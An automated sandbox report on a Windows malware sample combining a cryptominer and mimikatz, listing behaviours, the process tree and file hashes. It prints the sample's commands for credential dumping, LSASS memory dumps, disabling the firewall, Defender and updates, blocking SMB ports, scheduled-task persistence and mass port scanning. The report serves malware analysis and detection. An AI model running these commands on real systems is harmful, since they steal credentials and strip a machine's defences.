Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
02-10-2024 08:56
General
-
Target
2024-10-02_9878bd25b0a63da0309d6c691b27f3f9_hacktools_icedid_mimikatz.exe
-
Size
9.4MB
-
MD5
9878bd25b0a63da0309d6c691b27f3f9
-
SHA1
9c31c5b53aef259624fd8a1617fd3d0a9d82ed79
-
SHA256
971a54fd79887349cabbe9d11487e8b5b7af28504e9a56be28395df65afa1a68
-
SHA512
6d3126370b7a8c20055d913de9171eb1347976b5217bc0b778296a4f71f8f9abf8a38e087205e2b21cf877608b94a673e90cbb885f660ebcccee6f734f1d07db
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (19636) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 35 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\cgtzflmun\etrbcg.exe"C:\Windows\TEMP\cgtzflmun\etrbcg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-02_9878bd25b0a63da0309d6c691b27f3f9_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-02_9878bd25b0a63da0309d6c691b27f3f9_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\zrnbqagb\bvktrsb.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\zrnbqagb\bvktrsb.exeC:\Windows\zrnbqagb\bvktrsb.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\zrnbqagb\bvktrsb.exeC:\Windows\zrnbqagb\bvktrsb.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zrpibinil\igbbtbinb\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\zrpibinil\igbbtbinb\wpcap.exeC:\Windows\zrpibinil\igbbtbinb\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zrpibinil\igbbtbinb\bzqgcfbub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zrpibinil\igbbtbinb\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\zrpibinil\igbbtbinb\bzqgcfbub.exeC:\Windows\zrpibinil\igbbtbinb\bzqgcfbub.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\zrpibinil\igbbtbinb\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\zrpibinil\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\zrpibinil\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\zrpibinil\Corporate\vfshost.exeC:\Windows\zrpibinil\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ernbsdbun" /ru system /tr "cmd /c C:\Windows\ime\bvktrsb.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ernbsdbun" /ru system /tr "cmd /c C:\Windows\ime\bvktrsb.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "qabkiibgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "qabkiibgb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ltgnenzlz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ltgnenzlz" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 780 C:\Windows\TEMP\zrpibinil\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 1016 C:\Windows\TEMP\zrpibinil\1016.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2088 C:\Windows\TEMP\zrpibinil\2088.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2596 C:\Windows\TEMP\zrpibinil\2596.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2760 C:\Windows\TEMP\zrpibinil\2760.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2816 C:\Windows\TEMP\zrpibinil\2816.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2844 C:\Windows\TEMP\zrpibinil\2844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 3844 C:\Windows\TEMP\zrpibinil\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 3996 C:\Windows\TEMP\zrpibinil\3996.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 4064 C:\Windows\TEMP\zrpibinil\4064.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2812 C:\Windows\TEMP\zrpibinil\2812.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2692 C:\Windows\TEMP\zrpibinil\2692.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 556 C:\Windows\TEMP\zrpibinil\556.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 552 C:\Windows\TEMP\zrpibinil\552.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 1608 C:\Windows\TEMP\zrpibinil\1608.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 2424 C:\Windows\TEMP\zrpibinil\2424.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 1124 C:\Windows\TEMP\zrpibinil\1124.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\zrpibinil\uszrgkbhg.exeC:\Windows\TEMP\zrpibinil\uszrgkbhg.exe -accepteula -mp 3168 C:\Windows\TEMP\zrpibinil\3168.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\zrpibinil\igbbtbinb\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\zrpibinil\igbbtbinb\dmcubpzyb.exedmcubpzyb.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\lqvjma.exeC:\Windows\SysWOW64\lqvjma.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bvktrsb.exe1⤵
-
C:\Windows\ime\bvktrsb.exeC:\Windows\ime\bvktrsb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\bvktrsb.exe1⤵
-
C:\Windows\ime\bvktrsb.exeC:\Windows\ime\bvktrsb.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\cgtzflmun\etrbcg.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\zrnbqagb\bvktrsb.exe /p everyone:F2⤵
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
33.2MB
MD504d5ac90960c0e35d703910df579501c
SHA1bbec0577179db14c8b015aed8504dbdbd7a8d843
SHA2562b74ddb70a101f497a182686467a931f9bf2ff3a6ed044ac34faea80ba11bf30
SHA512ba08c5a7244f2735000e678161408caed79eff94620c1265f55b627ab63d2913ccd842fe43d73af9a9ec90d331c2b5851da23f01e159f2eae91e6e216502bf4e
-
Filesize
4.1MB
MD56d734bafa60ba316eeeb50b35da46191
SHA19fd98e187a275589b2ce1a6efa78ae12de94795d
SHA2560a3518f0e599ea7c1114f6ab496fee375e908ac084499895609a25978a9eb56f
SHA512955f58ec20c2abe6f4dfa3ca0cafec3daf4f1160a96ecee17a2f76d82d28e19cb780606a5656e07707fb9f92b3d783bf3c2d16eae500c9c3223fb10a6a3e3cbd
-
Filesize
3.5MB
MD5f42271ec5bbc615cba4f2a8aa2f77094
SHA100f771727514998122b02ad3bac1f10bca79e6e0
SHA256b440cc99b5d1dfad021459eb3d213c9ffc02c7b8b37ac423690a1c21faca8489
SHA5129f6e3ddc936e3eccdfe4f1e7a6b021a072c7bf11fe5070a24a56e24b0092f2fc29f0426836cbeee9e2d62c3fe68f8c825574ff2e747df21f5aeeba836ec6e60d
-
Filesize
26.0MB
MD5c0eed310b1318b1a7a70ec039735ab12
SHA185baa1b3044db43a0727f6a0a8467c1dc1d6da34
SHA25607d6703dd3aecd3e2641dc48581f07ddf02075290857b8742f5498dbf638ddf7
SHA5126362418f1e786232c30804874d0111a77567c114e08d1547058b7c041409dbff8666166fe40bbd6392868dea815d06ac8067571756d1cacafc726cb6fc6d40fa
-
Filesize
2.9MB
MD533e0abbe315678cae37c90b866ed8d35
SHA1c9ee6075d25616dcf215ff90e66c1290d24fee64
SHA2563b12e0ed9b357d9ac178ad8d1597b1d26ce0afe9ea015d992a96419c46be1767
